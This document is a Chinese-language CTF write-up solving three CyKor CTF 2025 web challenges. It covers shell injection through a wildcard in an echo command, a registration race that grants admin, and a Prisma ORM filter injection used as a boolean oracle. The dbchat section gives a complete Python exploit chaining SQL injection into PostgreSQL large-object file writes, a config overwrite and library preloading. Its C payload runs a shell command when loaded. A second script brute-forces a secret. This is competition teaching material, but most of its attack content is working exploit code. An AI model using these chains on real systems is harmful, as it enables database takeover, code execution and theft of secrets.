CyKor CTF 2025 Writeup
周末笔者边打 HITCTF 边打 CyKor CTF,属于是燃尽了。HITCTF 的 Writeup 先咕咕了,还有题目待复现。
Web
asterisk | 已解出
- 输入验证的时候允许 ASCII 码 ≤ 57 的字符通过,其中包含了& (38)、* (42)、' (39)、# (35)
- 我们的 input 直接拼接到 shell 命令中,没有任何过滤
const shell = `echo ${input} | node ../bin/mini-run.js --b64code '${b64code}'`;
- 当我们输入 `&*` 时:
  - `echo &` → echo 在后台执行
  - `*` → 展开为 ./users/ 目录下所有文件名
  - 第一个文件名作为命令执行,其余作为参数
- 所以我们可以创建用户 `sh` 和 `t`,其中 `t` 的文件内容保存为 `cat /flag`
dbchat | 已解出
- `register` 路由中,用户文件 (`save_user`) 是先保存的,但角色 (`ROLE` 列表) 的插入是在一个模拟的耗时操作 (`get_msg`) 之后进行的。`ROLE` 列表的顺序依赖于用户文件名的字母排序 (`get_username_rank`)。
- 所以我们注册两个用户,`slow` 用户用时长,字典序小;`fast` 用户用时短,字典序在 `slow` 和 admin 之间。
  - 当 `fast` 完成时,计算出自己在文件列表中的排名 (Rank 1),并向 `ROLE` 列表索引 1 插入 'user'。此时 `ROLE` 为 `['admin', 'user']`。
  - 当 `slow` 完成时,计算出自己在文件列表中的排名 (Rank 0),并向 `ROLE` 列表索引 0 插入 'user'。此时 `ROLE` 为 `['user', 'admin', 'user']`。
  - 此时 `fast` 用户对应的 `ROLE[1]` 变成了 admin,提权成功。
- 获取 Admin 权限后,`/admin/chat` 接口存在 SQL 注入漏洞。后端直接将用户输入拼接到 SQL 查询中:`SELECT ... FROM people WHERE name='{name}';`
- 对于 PostgreSQL,我们利用它的 Large Object 功能进行任意写。
  - 首先上传一个恶意库,定义构造函数使其加载时复制 flag 到用户名目录。
  - 再利用 `lo_create`、`lowrite`、`lo_export` 写入 `.so` 文件。
  - 接着覆盖 `postgresql.auto.conf`,设置 `session_preload_libraries = '/app/users/exploit.so'`。
  - 用 `pg_reload_conf()` 重载配置,然后发起新的数据库连接请求。这会触发 PostgreSQL 加载我们的恶意库并执行其中的命令。
  - 最后读取所有用户名获得 flag。
Exp:
exploit.py:
import urllib.request
import urllib.parse
import json
import threading
import time
import string
import random
import binascii
BASE_URL = "http://54.180.15.185:8081/play/1tHfAID8C7ZcFopX8v7XCWmUudOzfapF"
def _json_or_text(body):
    """Return *body* parsed as JSON, or the raw text when it is not valid JSON."""
    try:
        return json.loads(body)
    except ValueError:  # json.JSONDecodeError is a ValueError subclass
        return body


def make_request(endpoint, data=None, headers=None, method='GET', cookie_jar=None):
    """Send one HTTP request to ``BASE_URL + endpoint`` and time it.

    Args:
        endpoint: Path appended to ``BASE_URL``.
        data: Optional object; when not None it is sent as a JSON body.
        headers: Optional extra request headers. The mapping is copied, so
            the caller's dict is never modified.
        method: HTTP method name.
        cookie_jar: Optional dict of cookies. A non-empty jar is sent as the
            ``Cookie`` header; when a jar is supplied (even an empty one), a
            ``session`` cookie set by a successful response is stored in it.

    Returns:
        A ``(duration, payload)`` tuple. ``payload`` is the decoded JSON
        body when the body parses as JSON, otherwise the body text. HTTP
        error responses are returned the same way. For any other failure
        (connection error, undecodable success body, ...) the result is
        ``(0, str(exception))``.
    """
    url = f"{BASE_URL}{endpoint}"
    # Work on a copy: the original wrote Content-Type/Cookie into the
    # caller-supplied dict.
    headers = dict(headers) if headers else {}

    json_data = None
    if data is not None:
        json_data = json.dumps(data).encode('utf-8')
        headers['Content-Type'] = 'application/json'

    if cookie_jar:
        headers['Cookie'] = "; ".join(f"{k}={v}" for k, v in cookie_jar.items())

    start = time.time()
    req = urllib.request.Request(url, data=json_data, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req) as res:
            response_body = res.read().decode('utf-8')
            if cookie_jar is not None:
                # get_all() yields every Set-Cookie header separately;
                # getheader() comma-joins them, which can hide the
                # ``session`` pair behind another cookie's attributes.
                for cookie_header in res.headers.get_all('Set-Cookie', []):
                    for part in cookie_header.split(';'):
                        if '=' not in part:
                            continue
                        k, v = part.strip().split('=', 1)
                        if k == 'session':
                            cookie_jar['session'] = v
        duration = time.time() - start
        return duration, _json_or_text(response_body)
    except urllib.error.HTTPError as e:
        duration = time.time() - start
        # Decode leniently so an odd error page can never leave the body
        # undefined (the original raised NameError in that case).
        try:
            body = e.read().decode('utf-8', errors='replace')
        except OSError:
            body = ""
        return duration, _json_or_text(body)
    except Exception as e:
        # Best-effort boundary for the exploit script: report the failure
        # as text instead of aborting the whole run.
        return 0, str(e)
def register(username, password):
    """POST a registration for *username* with role "user" to /register.

    The server's reply is discarded; the function returns None.
    """
    form = {
        "username": username,
        "password": password,
        "confirm_password": password,
        "role": "user",
    }
    make_request("/register", form, method='POST')
def login(username, password):
    """Log in through POST /login.

    Returns:
        The cookie dict filled in by ``make_request`` when the reply is a
        JSON object with a truthy ``success`` field, otherwise None.
    """
    jar = {}
    credentials = {"username": username, "password": password}
    _, reply = make_request("/login", credentials, method='POST', cookie_jar=jar)
    logged_in = isinstance(reply, dict) and reply.get('success')
    return jar if logged_in else None
def check_admin(cookie_jar):
    """Return True when GET /admin with these cookies shows the admin page.

    The check is a substring match for "welcome to admin page" on the
    stringified response.
    """
    _, page = make_request("/admin", method='GET', cookie_jar=cookie_jar)
    return "welcome to admin page" in str(page)
def exploit_race():
    """Repeatedly race two registrations until the "fast" user is admin.

    Each of up to 100 attempts registers a "0"-prefixed user and, 5 ms
    later, a "1"-prefixed user on separate threads, then logs in as the
    second one and checks /admin.

    Returns:
        The admin session's cookie dict, or None if every attempt failed.
    """
    attempts_left = 100
    while attempts_left > 0:
        attempts_left -= 1

        digits = str(random.randint(10000, 99999))
        slow_user = f"0{digits}"
        fast_user = f"1{digits[:2]}"
        print(f"Attempting with Slow: {slow_user}, Fast: {fast_user}")

        slow_worker = threading.Thread(target=register, args=(slow_user, "pass"))
        fast_worker = threading.Thread(target=register, args=(fast_user, "pass"))

        # The slow registration gets a small head start before the fast one.
        slow_worker.start()
        time.sleep(0.005)
        fast_worker.start()
        for worker in (slow_worker, fast_worker):
            worker.join()

        session_cookies = login(fast_user, "pass")
        if session_cookies and check_admin(session_cookies):
            print(f"[+] Success! User {fast_user} is admin.")
            return session_cookies
    return None
def hex_encode(s):
    """Return the lowercase hex digits of *s* encoded as UTF-8."""
    raw = s.encode()
    return raw.hex()
def _admin_sqli(cookies, sql_expr):
    """Evaluate *sql_expr* through the /admin/chat SQL injection.

    The expression is wrapped as ``' UNION SELECT <expr>::text --`` and sent
    in the ``question`` field after the ``what is name of `` prefix.

    Returns:
        The response payload as returned by ``make_request``.
    """
    payload = f"' UNION SELECT {sql_expr}::text --"
    question = f"what is name of {payload}"
    _, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
    return resp


if __name__ == "__main__":
    # Load the payload library first: a missing file should abort before the
    # race or any large object has changed state on the server.
    try:
        with open("exploit.so", "rb") as f:
            so_hex = f.read().hex()
    except OSError as e:
        print(f"Failed to read exploit.so: {e}")
        raise SystemExit(1)

    cookies = exploit_race()
    if cookies:
        # 3-step Large Object upload
        # 1. Create LO with specific OID
        oid = random.randint(20000, 80000)
        print(f"Using OID: {oid}")
        print("Creating LO...")
        _admin_sqli(cookies, f"lo_create({oid})")

        # 2. Write data to LO in one big write.
        # 131072 == 0x20000, the INV_WRITE mode flag of PostgreSQL's
        # large-object API.
        print("Writing data to LO...")
        resp = _admin_sqli(cookies, f"lowrite(lo_open({oid}, 131072), decode('{so_hex}', 'hex'))")
        print(resp)

        # 3. Export to file
        print("Exporting to /app/users/exploit.so...")
        resp = _admin_sqli(cookies, f"lo_export({oid}, '/app/users/exploit.so')")
        print(resp)

        # Now same for postgresql.auto.conf
        oid2 = oid + 1
        print(f"Using OID2: {oid2}")
        print("Creating LO 2...")
        _admin_sqli(cookies, f"lo_create({oid2})")

        config_content = "session_preload_libraries = '/app/users/exploit.so'\n"
        config_hex = hex_encode(config_content)
        print("Writing config to LO 2...")
        _admin_sqli(cookies, f"lowrite(lo_open({oid2}, 131072), decode('{config_hex}', 'hex'))")

        config_path = "/var/lib/postgresql/17/main/postgresql.auto.conf"
        print("Exporting config...")
        resp = _admin_sqli(cookies, f"lo_export({oid2}, '{config_path}')")
        print(resp)

        # Reload config
        print("Reloading config...")
        resp = _admin_sqli(cookies, "pg_reload_conf()")
        print(resp)

        # Trigger: any further request to the chat endpoint; per the
        # writeup this opens a new database connection, which loads the
        # preloaded library.
        print("Triggering execution...")
        make_request("/admin/chat", {"question": "trigger"}, method='POST', cookie_jar=cookies)

        # Check users: the payload leaves the flag as a file name under
        # /app/users, which the user listing is expected to show.
        time.sleep(1)
        print("Checking users...")
        _, users_list = make_request("/admin/users", method='GET', cookie_jar=cookies)
        print(f"Users: {users_list}")
        listing = str(users_list)
        if "CyKor" in listing:
            print("FOUND FLAG!")
            for part in listing.split(", "):
                if "CyKor" in part:
                    print(f"Flag: {part}")
exploit.c:
/* Payload library: the work is done by a load-time constructor, so nothing
 * has to call into the library explicitly. */
#include <stdlib.h>
/* The constructor attribute makes my_init run when the shared object is
 * loaded. */
void __attribute__((constructor)) my_init() {
/* $(/app/flag) is shell command substitution: /app/flag is executed and its
 * output becomes the name of the copied .json file under /app/users. */
system("cp /app/users/admin.json /app/users/$(/app/flag).json");
}
flag checker | 已解出
`User` 模型包含 `username`(公开/可控)、`answer`(私密/目标)和 `stage`。`/leaderboard` 接口接受 usernames 数组,并执行以下 Prisma 查询:
// src/index.ts
// Builds the Prisma filter for the leaderboard query: with no usernames only
// the stage filter applies; otherwise the row must match any of the supplied
// usernames AND the stage filter.
const where = !usernames || usernames.length === 0
? { stage: whereStage }
: {
AND: [
{
// Injection point: each array element is placed directly into the username
// filter; the `string` annotation is compile-time only.
OR: usernames.map((username: string) => ({ username })),
},
{ stage: whereStage },
],
};
// Only the ids of the matching users are selected.
const result = await prisma.user.findMany({ where, select: { id: true } });
- 直接拼接的 usernames 导致可以注入,我们可以构造 `usernames: [{ "gt": { "_ref": "answer", "_container": "User" } }]` 来让 Prisma 将其翻译为 SQL 中的 `WHERE "username" > "answer"`,也即返回所有 username > answer 的 ID 列表。
- 此时我们完成了一个 Bool 类型的侧信道攻击,可以爆破 answer 了。
Exp:
import requests
import json
import sys
import time
import random
import string
BASE_URL = "http://3.37.112.26:3000"
USERNAME = "12312redsaf123"
PASSWORD = "password123"
CURRENT_PASSWORD = PASSWORD
ANSWER_REF = {"_ref":"answer","_container":"User"}
def register(username, password):
    """Create the account through POST /register.

    Returns:
        True when the server answers 200, or when the response text contains
        "Signup failed" (presumably an already-existing account -- confirm
        against the server); False otherwise.
    """
    credentials = {"username": username, "password": password}
    res = requests.post(f"{BASE_URL}/register", json=credentials)
    if res.status_code == 200:
        return True
    return "Signup failed" in res.text
def login(username, password):
    """Open a ``requests.Session`` and authenticate it through POST /login.

    Returns:
        The session used for the login request.

    Raises:
        Exception: If the status is not 200 or the response text contains
            "failed".
    """
    session = requests.Session()
    credentials = {"username": username, "password": password}
    reply = session.post(f"{BASE_URL}/login", json=credentials)
    accepted = reply.status_code == 200 and "failed" not in reply.text
    if not accepted:
        raise Exception("Login failed")
    return session
def update_username(session, new_username, password):
    """Rename the logged-in account through POST /update.

    The same *password* is sent as both the new and the old password. The
    call sleeps 0.1 s before the request and another 0.2 s after a
    successful one.

    Returns:
        True when the response text contains "successful", else False.
    """
    time.sleep(0.1)
    res = session.post(
        f"{BASE_URL}/update",
        json={
            "username": new_username,
            "password": password,
            "oldPassword": password,
        },
    )
    if "successful" in res.text:
        time.sleep(0.2)
        return True
    return False
def get_my_id(session, username):
    """Look up the id of *username* through the /leaderboard endpoint.

    Queries for an exact username match at any stage >= 0.

    Returns:
        The first id in the response's ``ids`` list, or None when the key
        is missing or the list is empty.
    """
    query = {
        "usernames": [{"equals": username}],
        "stage": {"gte": 0},
    }
    body = session.post(f"{BASE_URL}/leaderboard", json=query).json()
    matches = body["ids"] if "ids" in body else None
    return matches[0] if matches else None
def check_condition(session, stage, probe_username, my_id):
    """Ask the leaderboard oracle whether our username sorts above the answer.

    Posts a filter selecting users at exactly *stage* whose ``username`` is
    greater than their own ``answer`` field (via ``ANSWER_REF``) and checks
    whether *my_id* is among the returned ids.

    Args:
        session: Authenticated ``requests.Session``.
        stage: Stage number used in the ``equals`` stage filter.
        probe_username: Unused here; kept so existing callers keep working.
        my_id: Id of the probing account.

    Returns:
        True when *my_id* is in the response's ``ids``; False otherwise,
        including when the response is not usable JSON.
    """
    payload = {
        "usernames": [{"gt": ANSWER_REF}],
        "stage": {"equals": stage}
    }
    res = session.post(f"{BASE_URL}/leaderboard", json=payload)
    try:
        data = res.json()
        if "ids" in data:
            return my_id in data["ids"]
    except (ValueError, TypeError):
        # ValueError: body is not JSON; TypeError: JSON of an unexpected
        # shape. A bare ``except`` here also swallowed KeyboardInterrupt,
        # which made the long brute force hard to stop.
        pass
    return False
def solve_stage(session, stage_num, my_id):
    """Recover and submit the answer of one stage via the comparison oracle.

    For each of the 16 unknown characters, the account is renamed to
    ``known + candidate + suffix`` and ``check_condition`` reports whether
    that name sorts above the answer. A binary search finds the smallest
    candidate that does; the answer character is the one just below it.

    Args:
        session: Authenticated ``requests.Session``.
        stage_num: Stage whose answer is being recovered.
        my_id: Id of the probing account.

    Returns:
        True when the submission response contains "Answer correct" or a
        "CyKor{" flag; False otherwise, including when the oracle gives an
        impossible result for some position.

    Raises:
        Exception: If renaming fails twice in a row for the same probe.
    """
    print(f"Solving Stage {stage_num}...")
    known = "KyCor{"
    # Hex digits plus 'g' as a sentinel that sorts above 'f'.
    charset = "0123456789abcdefg"
    # Characters smaller than '0' (ASCII 48), so the suffix can never push a
    # probe with a matching prefix above the answer.
    safe_low_chars = "!#$%&'()*+,-./"
    answer_len = 16

    def random_suffix(min_len, max_len):
        """Return a random run of low characters; keeps probe names unique."""
        return "".join(
            random.choice(safe_low_chars)
            for _ in range(random.randint(min_len, max_len))
        )

    for i in range(answer_len):
        low = 0
        high = len(charset) - 1
        ans_idx = high
        while low <= high:
            mid = (low + high) // 2
            char_to_test = charset[mid]
            # Construct probe with random suffix to avoid collision
            probe = known + char_to_test + random_suffix(1, 5)
            if not update_username(session, probe, CURRENT_PASSWORD):
                print(f" [!] Collision for {probe}. Retrying with new suffix...")
                probe = known + char_to_test + random_suffix(6, 10)
                if not update_username(session, probe, CURRENT_PASSWORD):
                    raise Exception(f"Persistent collision for {probe}")
            is_greater = check_condition(session, stage_num, probe, my_id)
            if is_greater:
                ans_idx = mid
                high = mid - 1
            else:
                low = mid + 1
        if ans_idx == 0:
            # Even the smallest candidate sorted above the answer, so the
            # character is outside the charset. charset[-1] would silently
            # pick the sentinel 'g' here.
            print(f" [!] No candidate fits position {i+1}/{answer_len}; oracle result is inconsistent.")
            return False
        found_char = charset[ans_idx - 1]
        known += found_char
        print(f" Found char {i+1}/16: {found_char} -> {known}")

    final_answer = known + "}"
    print(f"Stage {stage_num} Answer: {final_answer}")
    res = session.post(f"{BASE_URL}/answer", json={"answer": final_answer})
    print(f"Submit: {res.text}")
    time.sleep(0.5)
    if "Answer correct" in res.text:
        return True
    elif "CyKor{" in res.text:
        print(f"FLAG FOUND: {res.json()['message']}")
        return True
    else:
        print("Something went wrong.")
        return False
def main():
    """Register, log in, find our own id, then solve stages 0 through 9.

    Stops at the first stage that ``solve_stage`` reports as failed.
    """
    register(USERNAME, PASSWORD)
    session = login(USERNAME, PASSWORD)

    my_id = get_my_id(session, USERNAME)
    print(f"My ID: {my_id}")
    if not my_id:
        print("Could not find my ID.")
        return

    for stage in range(10):
        if not solve_stage(session, stage, my_id):
            break


if __name__ == "__main__":
    main()